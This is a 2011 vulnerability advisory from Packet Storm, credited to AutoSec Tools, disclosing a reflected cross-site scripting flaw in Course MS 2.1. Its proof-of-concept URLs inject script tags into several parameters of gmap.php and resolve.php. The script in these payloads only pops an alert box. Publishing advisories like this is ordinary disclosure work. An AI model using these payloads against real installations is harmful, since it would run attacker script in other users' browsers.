Course MS 2.1 Cross Site Scripting

2011-02-22T00:00:00
ID PACKETSTORM:98641
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-22T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................Course MS 2.1  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://sourceforge.net/projects/coursems  
Release Date............2/14/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in Course MS 2.1 can be  
exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
http://localhost/coursems2_2/gmap.php?lat=%3Cscript%3Ealert(0)%3C/script%3E&lon=%3Cscript%3Ealert(0)%3C/script%3E&add1=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E&width=%3Cscript%3Ealert(0)%3C/script%3E&height=%3Cscript%3Ealert(0)%3C/script%3E  
  
  
http://localhost/coursems2_2/resolve.php?add1=%3Cscript%3Ealert(0)%3C/script%3E  
`